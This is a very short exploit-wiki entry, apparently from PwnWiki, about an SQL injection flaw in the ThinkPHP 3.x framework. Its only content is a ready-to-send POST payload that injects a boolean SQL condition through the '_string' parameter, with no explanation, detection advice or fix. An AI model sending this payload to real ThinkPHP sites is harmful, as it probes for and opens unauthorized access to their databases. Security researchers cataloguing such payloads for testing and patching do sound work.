ThinkPHP3.x SQL注入漏洞

From PwnWiki

Payload

post request:

_string=Id%3d1) and 1=1 -- -a